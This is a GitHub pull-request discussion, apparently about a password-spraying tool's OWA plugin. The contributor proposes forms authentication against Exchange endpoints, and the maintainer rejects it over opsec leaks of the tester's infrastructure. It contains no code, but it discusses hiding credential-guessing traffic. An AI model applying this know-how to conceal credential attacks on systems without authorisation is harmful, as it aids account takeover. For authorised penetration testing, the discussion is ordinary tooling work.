Open techspence opened 1 year ago
knavesec
commented
1 year ago Apologies for the 6mo wait
I like and appreciate the work you did for this, but the goal of this tool is to remain as opsec-conscious as possible. If you're able to find ways to abuse these services through fireprox I'd be happy to merge but I can't knowing there would be leaks. I do agree, we're testing verified client environments, but leaking any infrastructure is a dealbreaker
techspence
commented
1 year ago I definitely understand the opsec requirements. I appreciate you reviewing the PR. If I can find a way to do this while meeting your requirements I will send another PR.
knavesec
commented
1 year ago From what I'm seeing, there are 3 places where there is a leak:
Idk, it doesn't seem like it uses the fireprox apis at all unless I'm mistaken, at that point you could just use the Metasploit module or something that's better tried and tested
TLDR: This PR seeks to resolve the issue OWA/EWS Plugins Authentication Failed with Valid Credentials by changing the owa plugin to use forms auth instead of NTLM against the auto-discover endpoint.
Note: There are a couple of opsec drawbacks with this, but for the purposes of testing a client environment, I'm personally ok with those drawbacks.
Summary of changes:
check_pathusescheck_urlto check each of the owa endpoints to see which one is in useStrange behavior:
x-amzn-remapped-www-authenticateheader to work with the OWA plugin so I fall back to usingWWW-Authenticate. I'm not sure of the implications of this"Content-Type": "text/xml"header causes the request to fail with 400 errors, so I exclude itI've tested this a bit in my lab, but I would very much welcome others testing this to see if I've introduced any bugs/issues/incompatibilities/etc. If there's anything that requires fixing I'm happy to work on it.
I hope this PR can help the project even just a tiny bit. Cheers!